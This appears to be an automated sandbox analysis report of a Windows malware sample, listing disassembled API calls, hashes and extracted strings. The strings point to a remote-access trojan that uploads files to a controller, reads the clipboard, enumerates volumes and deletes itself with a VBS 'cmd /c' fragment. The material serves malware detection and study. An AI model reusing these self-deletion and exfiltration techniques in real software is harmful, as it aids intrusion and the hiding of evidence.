                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$86l$C:\Users\user\Desktop\FPPhfkcDCh.exe$`m$del$open$xdF
                                                  • API String ID: 1579085052-3929097815
                                                  • Opcode ID: 1f26a9a137c80f5632c92eb2222ab7f2ba6ebdcc1e6d02a5e4a10b2a6e82a7e9
                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                  • Opcode Fuzzy Hash: 1f26a9a137c80f5632c92eb2222ab7f2ba6ebdcc1e6d02a5e4a10b2a6e82a7e9
                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID: X,l
                                                  • API String ID: 3899193279-3772506311
                                                  • Opcode ID: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                  • Opcode Fuzzy Hash: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$,aF$0TG$0TG$NG$NG
                                                  • API String ID: 1223786279-4119708859
                                                  • Opcode ID: eaa82bcfc7eecefdd05ab97e79a0612f1416c02065666deff46019d408466eaa
                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                  • Opcode Fuzzy Hash: eaa82bcfc7eecefdd05ab97e79a0612f1416c02065666deff46019d408466eaa
                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $xdF$NG
                                                  • API String ID: 3086580692-3944908133
                                                  • Opcode ID: 4862477fdb9952e5eeaa3378eb83c1e6897d22439acc3b3fc52933e10b919cae
                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                  • Opcode Fuzzy Hash: 4862477fdb9952e5eeaa3378eb83c1e6897d22439acc3b3fc52933e10b919cae
                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                  • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open$xdF
                                                  • API String ID: 1913171305-1736969612
                                                  • Opcode ID: 8bbe4f0fb6c88a2abc4eeafe0384b11dbe09999f44ef1c7605111127e7698097
                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                  • Opcode Fuzzy Hash: 8bbe4f0fb6c88a2abc4eeafe0384b11dbe09999f44ef1c7605111127e7698097
                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$getaddrinfo
                                                  • API String ID: 2490988753-3078833738
                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                  • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                  • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
